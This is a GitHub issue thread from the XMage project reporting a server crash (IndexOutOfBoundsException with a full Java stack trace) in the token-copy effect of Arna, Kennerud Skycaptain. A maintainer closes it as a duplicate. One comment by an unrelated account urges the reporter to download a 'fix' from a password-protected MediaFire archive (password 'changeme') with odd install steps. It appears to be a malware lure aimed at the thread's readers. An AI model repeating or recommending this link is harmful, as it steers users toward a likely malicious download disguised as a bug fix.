### ISSUE TITLE
Empty list when creating tokens in effect of Arna, Kennerud Skycaptain

### ISSUE THREAD

**Issue by Nekobrenna** [magefree/mage#12741] opened 2024-08-27 02:46 UTC
Error type: SERVER - game error
Client version: 1.4.53-V1 (build: 2024-08-16 15:36)

Game error occurred: 

java.lang.IndexOutOfBoundsException: Index: 0, Size: 0
Server version: 1.4.53-V1 (build: 2024-08-16 15:36)
Stack trace:
java.util.ArrayList.rangeCheck(ArrayList.java:659)
java.util.ArrayList.get(ArrayList.java:435)
mage.game.permanent.token.TokenImpl.putOntoBattlefieldHelper(TokenImpl.java:435)
mage.game.permanent.token.TokenImpl.putOntoBattlefield(TokenImpl.java:254)
mage.game.permanent.token.TokenImpl.putOntoBattlefield(TokenImpl.java:218)
mage.abilities.effects.common.CreateTokenCopyTargetEffect.apply(CreateTokenCopyTargetEffect.java:273)
mage.cards.a.ArnaKennerudSkycaptainTargetEffect.apply(ArnaKennerudSkycaptain.java:114)
mage.abilities.AbilityImpl.resolveMode(AbilityImpl.java:222)
mage.abilities.AbilityImpl.resolve(AbilityImpl.java:206)
mage.abilities.TriggeredAbilityImpl.resolve(TriggeredAbilityImpl.java:205)
mage.game.stack.StackAbility.resolve(StackAbility.java:85)
mage.game.GameImpl.resolve(GameImpl.java:1804)
mage.game.GameImpl.playPriority(GameImpl.java:1727)
mage.game.turn.Step.priority(Step.java:67)
mage.game.turn.Phase.playStep(Phase.java:205)
mage.game.turn.Phase.play(Phase.java:91)
mage.game.turn.Turn.play(Turn.java:137)
mage.game.GameImpl.playTurn(GameImpl.java:1151)
mage.game.GameImpl.play(GameImpl.java:1058)
mage.game.GameImpl.start(GameImpl.java:1034)
mage.server.game.GameWorker.call(GameWorker.java:35)
mage.server.game.GameWorker.call(GameWorker.java:16)
java.util.concurrent.FutureTask.run(FutureTask.java:266)
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
java.lang.Thread.run(Thread.java:750)

**Comment by jia6214876** [comment] 2024-08-27 02:47
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xenohedron** [comment] 2024-08-27 03:37
duplicate of #12580

**Closed by xenohedron** 2024-08-27 03:37 UTC
Labels: bug
